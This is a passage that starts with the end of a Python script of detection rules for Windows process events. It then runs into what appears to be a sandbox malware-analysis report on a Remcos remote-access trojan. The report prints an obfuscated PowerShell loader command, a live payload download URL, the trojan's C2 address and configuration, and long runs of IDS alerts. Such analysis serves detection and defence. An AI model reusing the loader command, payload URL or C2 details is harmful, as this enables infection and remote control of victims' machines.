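    return e["EventID"] == 1 and base(e["ParentImage"]) == "mshta.exe" and base(e["Image"]) in SHELLS


def rule_csc_from_script_host(e):
    return (e["EventID"] == 1 and base(e["Image"]) in {"csc.exe", "vbc.exe"}
            and (base(e["ParentImage"]) in SCRIPT_HOSTS
                 or "\\appdata\\local\\temp\\" in e["CommandLine"].lower()))


def rule_ps_drops_binary(e):
    return (e["EventID"] == 11 and base(e["Image"]) in {"powershell.exe", "pwsh.exe"}
            and e["TargetFilename"].lower().endswith(DROPPED_EXT))


def rule_case_anomaly(e):
    # Look at the leading tokens only; a long path token is ignored by the letter
    # threshold unless it really alternates case.
    if e["EventID"] != 1:
        return False
    tokens = e["CommandLine"].split()[:8]
    return any(sum(c.isalpha() for c in t) >= 6 and case_flip_ratio(t) >= 0.5 for t in tokens)


def rule_script_host_runs_appdata_binary(e):
    img = e["Image"].lower()
    return (e["EventID"] == 1 and base(e["ParentImage"]) in SCRIPT_HOSTS
            and "\\appdata\\" in img and img.endswith(".exe"))


RULES = {
    "Suspicious MSHTA child process": rule_mshta_child,
    "Dynamic .NET compilation via csc.exe": rule_csc_from_script_host,
    "PowerShell drops binary/script": rule_ps_drops_binary,
    "PowerShell case anomaly": rule_case_anomaly,
    "Script host launches binary from AppData": rule_script_host_runs_appdata_binary,
}


def run_rules(events):
    """Return sorted (rule label, ProcessId) pairs for every event a rule matches."""
    hits = {(name, e["ProcessId"]) for e in events for name, fn in RULES.items() if fn(e)}
    return sorted(hits)


if __name__ == "__main__":
    for name, pid in run_rules(EVENTS):
        print(f"{name:45} PID {pid}")
```

Run against the sample events, the chain lights up five of the six logged processes (mshta.exe itself is only interesting through its child) while the control launch matches nothing; the case-anomaly check is the one that does not depend on parent/child relationships and survives if the attacker drops the cmd.exe hop.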

                Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", ProcessId: 4820, ProcessName: csc.exe

                Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security; Data: Details: A6 89 47 0A CF A6 55 9D 61 D5 AB 98 62 18 C8 E3 BF 69 23 8D 56 FD F5 35 64 E5 C3 2F 3D C8 4C D2 45 4A 89 04 E2 31 EE 0C 8F 6B 22 F7 F6 45 8D 96 D9 4B 6F 34 96 CC F7 C3 44 22 17 3B 6C EC 11 EA 44 2E DF 83 CC 25 90 FE 93 A4 CC 98 09 D1 BA 8A F1 B4 A5 A6 4A C2 AD 43 12 42 11 AA 89 C2 10 C7 0C 1F 32 A8 5F E1 43 AA 09 8F 73 33 10 69 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe, ProcessId: 7088, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-GJDISH\exepath
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T17:30:37.463478+010020365941Malware Command and Control Activity Detected192.168.2.449731107.173.4.162560TCP
                2024-12-16T17:30:40.729168+010020365941Malware Command and Control Activity Detected192.168.2.449732107.173.4.162560TCP
                2024-12-16T17:30:43.911956+010020365941Malware Command and Control Activity Detected192.168.2.449734107.173.4.162560TCP
                2024-12-16T17:30:46.979534+010020365941Malware Command and Control Activity Detected192.168.2.449737107.173.4.162560TCP
                2024-12-16T17:30:50.058328+010020365941Malware Command and Control Activity Detected192.168.2.449740107.173.4.162560TCP
                2024-12-16T17:30:53.199623+010020365941Malware Command and Control Activity Detected192.168.2.449742107.173.4.162560TCP
                2024-12-16T17:30:56.518752+010020365941Malware Command and Control Activity Detected192.168.2.449743107.173.4.162560TCP
                2024-12-16T17:30:59.594117+010020365941Malware Command and Control Activity Detected192.168.2.449744107.173.4.162560TCP
                2024-12-16T17:31:02.738356+010020365941Malware Command and Control Activity Detected192.168.2.449745107.173.4.162560TCP
                2024-12-16T17:31:05.840521+010020365941Malware Command and Control Activity Detected192.168.2.449746107.173.4.162560TCP
                2024-12-16T17:31:08.903925+010020365941Malware Command and Control Activity Detected192.168.2.449747107.173.4.162560TCP
                2024-12-16T17:31:12.005673+010020365941Malware Command and Control Activity Detected192.168.2.449748107.173.4.162560TCP
                2024-12-16T17:31:15.057924+010020365941Malware Command and Control Activity Detected192.168.2.449749107.173.4.162560TCP
                2024-12-16T17:31:18.120444+010020365941Malware Command and Control Activity Detected192.168.2.449750107.173.4.162560TCP
                2024-12-16T17:31:21.183831+010020365941Malware Command and Control Activity Detected192.168.2.449752107.173.4.162560TCP
                2024-12-16T17:31:24.262126+010020365941Malware Command and Control Activity Detected192.168.2.449758107.173.4.162560TCP
                2024-12-16T17:31:27.417659+010020365941Malware Command and Control Activity Detected192.168.2.449765107.173.4.162560TCP
                2024-12-16T17:31:30.480124+010020365941Malware Command and Control Activity Detected192.168.2.449776107.173.4.162560TCP
                2024-12-16T17:31:33.563539+010020365941Malware Command and Control Activity Detected192.168.2.449782107.173.4.162560TCP
                2024-12-16T17:31:36.621978+010020365941Malware Command and Control Activity Detected192.168.2.449792107.173.4.162560TCP
                2024-12-16T17:31:39.831861+010020365941Malware Command and Control Activity Detected192.168.2.449799107.173.4.162560TCP
                2024-12-16T17:31:42.909917+010020365941Malware Command and Control Activity Detected192.168.2.449804107.173.4.162560TCP
                2024-12-16T17:31:46.063526+010020365941Malware Command and Control Activity Detected192.168.2.449814107.173.4.162560TCP
                2024-12-16T17:31:49.172233+010020365941Malware Command and Control Activity Detected192.168.2.449820107.173.4.162560TCP
                2024-12-16T17:31:52.246851+010020365941Malware Command and Control Activity Detected192.168.2.449827107.173.4.162560TCP
                2024-12-16T17:31:55.347908+010020365941Malware Command and Control Activity Detected192.168.2.449837107.173.4.162560TCP
                2024-12-16T17:31:58.428007+010020365941Malware Command and Control Activity Detected192.168.2.449843107.173.4.162560TCP
                2024-12-16T17:32:01.557935+010020365941Malware Command and Control Activity Detected192.168.2.449852107.173.4.162560TCP
                2024-12-16T17:32:05.289148+010020365941Malware Command and Control Activity Detected192.168.2.449860107.173.4.162560TCP
                2024-12-16T17:32:08.375879+010020365941Malware Command and Control Activity Detected192.168.2.449868107.173.4.162560TCP
                2024-12-16T17:32:11.645186+010020365941Malware Command and Control Activity Detected192.168.2.449877107.173.4.162560TCP
                2024-12-16T17:32:14.716900+010020365941Malware Command and Control Activity Detected192.168.2.449884107.173.4.162560TCP
                2024-12-16T17:32:17.857163+010020365941Malware Command and Control Activity Detected192.168.2.449894107.173.4.162560TCP
                2024-12-16T17:32:21.078162+010020365941Malware Command and Control Activity Detected192.168.2.449899107.173.4.162560TCP
                2024-12-16T17:32:24.131784+010020365941Malware Command and Control Activity Detected192.168.2.449906107.173.4.162560TCP
                2024-12-16T17:32:27.393382+010020365941Malware Command and Control Activity Detected192.168.2.449915107.173.4.162560TCP
                2024-12-16T17:32:30.366328+010020365941Malware Command and Control Activity Detected192.168.2.449922107.173.4.162560TCP
                2024-12-16T17:32:33.299389+010020365941Malware Command and Control Activity Detected192.168.2.449929107.173.4.162560TCP
                2024-12-16T17:32:36.169190+010020365941Malware Command and Control Activity Detected192.168.2.449938107.173.4.162560TCP
                2024-12-16T17:32:39.032418+010020365941Malware Command and Control Activity Detected192.168.2.449945107.173.4.162560TCP
                2024-12-16T17:32:41.859982+010020365941Malware Command and Control Activity Detected192.168.2.449951107.173.4.162560TCP
                2024-12-16T17:32:44.685978+010020365941Malware Command and Control Activity Detected192.168.2.449959107.173.4.162560TCP
                2024-12-16T17:32:47.466166+010020365941Malware Command and Control Activity Detected192.168.2.449968107.173.4.162560TCP
                2024-12-16T17:32:50.263798+010020365941Malware Command and Control Activity Detected192.168.2.449974107.173.4.162560TCP
                2024-12-16T17:32:53.027684+010020365941Malware Command and Control Activity Detected192.168.2.449980107.173.4.162560TCP
                2024-12-16T17:32:55.731756+010020365941Malware Command and Control Activity Detected192.168.2.449987107.173.4.162560TCP
                2024-12-16T17:32:58.435921+010020365941Malware Command and Control Activity Detected192.168.2.449993107.173.4.162560TCP
                2024-12-16T17:33:01.111052+010020365941Malware Command and Control Activity Detected192.168.2.450003107.173.4.162560TCP
                2024-12-16T17:33:03.754623+010020365941Malware Command and Control Activity Detected192.168.2.450009107.173.4.162560TCP
                2024-12-16T17:33:06.392061+010020365941Malware Command and Control Activity Detected192.168.2.450015107.173.4.162560TCP
                2024-12-16T17:33:09.001423+010020365941Malware Command and Control Activity Detected192.168.2.450022107.173.4.162560TCP
                2024-12-16T17:33:11.627020+010020365941Malware Command and Control Activity Detected192.168.2.450028107.173.4.162560TCP
                2024-12-16T17:33:14.205806+010020365941Malware Command and Control Activity Detected192.168.2.450038107.173.4.162560TCP
                2024-12-16T17:33:16.784252+010020365941Malware Command and Control Activity Detected192.168.2.450044107.173.4.162560TCP
                2024-12-16T17:33:19.329978+010020365941Malware Command and Control Activity Detected192.168.2.450049107.173.4.162560TCP
                2024-12-16T17:33:21.926481+010020365941Malware Command and Control Activity Detected192.168.2.450055107.173.4.162560TCP
                2024-12-16T17:33:24.475070+010020365941Malware Command and Control Activity Detected192.168.2.450059107.173.4.162560TCP
                2024-12-16T17:33:27.049050+010020365941Malware Command and Control Activity Detected192.168.2.450060107.173.4.162560TCP
                2024-12-16T17:33:29.548833+010020365941Malware Command and Control Activity Detected192.168.2.450061107.173.4.162560TCP
                2024-12-16T17:33:32.019962+010020365941Malware Command and Control Activity Detected192.168.2.450062107.173.4.162560TCP
                2024-12-16T17:33:34.467071+010020365941Malware Command and Control Activity Detected192.168.2.450063107.173.4.162560TCP
                2024-12-16T17:33:36.968098+010020365941Malware Command and Control Activity Detected192.168.2.450064107.173.4.162560TCP
                2024-12-16T17:33:39.408042+010020365941Malware Command and Control Activity Detected192.168.2.450065107.173.4.162560TCP
                2024-12-16T17:33:41.846513+010020365941Malware Command and Control Activity Detected192.168.2.450066107.173.4.162560TCP
                2024-12-16T17:33:44.250391+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50067 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:33:46.675082+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50068 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:33:49.064098+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50069 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:33:51.488115+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50070 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:33:53.962241+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50071 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:33:56.377519+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50072 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:33:58.890768+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50073 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:01.357874+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50074 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:03.826995+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50075 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:06.331131+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50076 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:08.752658+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50077 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:11.163417+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50078 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:13.640104+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50079 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:16.084200+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50080 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:18.650734+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50081 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:21.062809+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50082 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:23.576702+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50083 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:26.009269+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50084 | 107.173.4.16 | 2560 | TCP
                2024-12-16T17:34:28.541837+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50085 | 107.173.4.16 | 2560 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-16T17:30:28.928530+0100 | 2022050 | 1 | A Network Trojan was detected | 192.3.179.166 | 80 | 192.168.2.4 | 49730 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-16T17:30:29.310927+0100 | 2022051 | 1 | A Network Trojan was detected | 192.3.179.166 | 80 | 192.168.2.4 | 49730 | TCP

                AV Detection

                Source: http://192.3.179.166/75/ecome.exe | Avira URL Cloud: Label: malware
                Source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["107.173.4.16:2560:1"], "Assigned name": "elvis", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GJDISH", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe | ReversingLabs: Detection: 39%
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | ReversingLabs: Detection: 39%
                Source: newthingswithgreatupdateiongivenbestthingswithme.hta | ReversingLabs: Detection: 15%
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_2_0043293A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007B2BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_2_007B2BA1
                Source: nicetomeetyousweeet.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

                Exploits

                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR

                Privilege Escalation

                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00406764 _wcslen,CoGetObject,6_2_00406764

                Phishing

                Source: Yara match | File source: newthingswithgreatupdateiongivenbestthingswithme.hta, type: SAMPLE

                Compliance

                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Unpacked PE file: 6.2.nicetomeetyousweeet.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.pdb source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0040B335
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0041B42F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0040B53A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_004089A9
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00406AC2 FindFirstFileW,FindNextFileW,6_2_00406AC2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00407A8C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_00418C69
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_00408DA7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0078900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_2_0078900E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0078B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0078B59C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0079B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0079B696
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00787CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00787CF3
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00786D29 FindFirstFileW,FindNextFileW,6_2_00786D29
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00798ED0 FindFirstFileW,6_2_00798ED0
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_00406F06

                Networking

                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49732 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49731 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49737 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49740 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 192.3.179.166:80 -> 192.168.2.4:49730
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49747 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49744 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49748 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49743 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49752 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49746 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49749 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49745 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49750 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49776 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 192.3.179.166:80 -> 192.168.2.4:49730
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49792 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49758 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49782 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49804 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49799 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49765 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49814 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49827 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49820 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49852 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49837 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49868 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49860 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49877 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49884 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49894 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49906 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49915 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49922 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49929 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49938 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49951 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49945 -> 107.173.4.16:2560
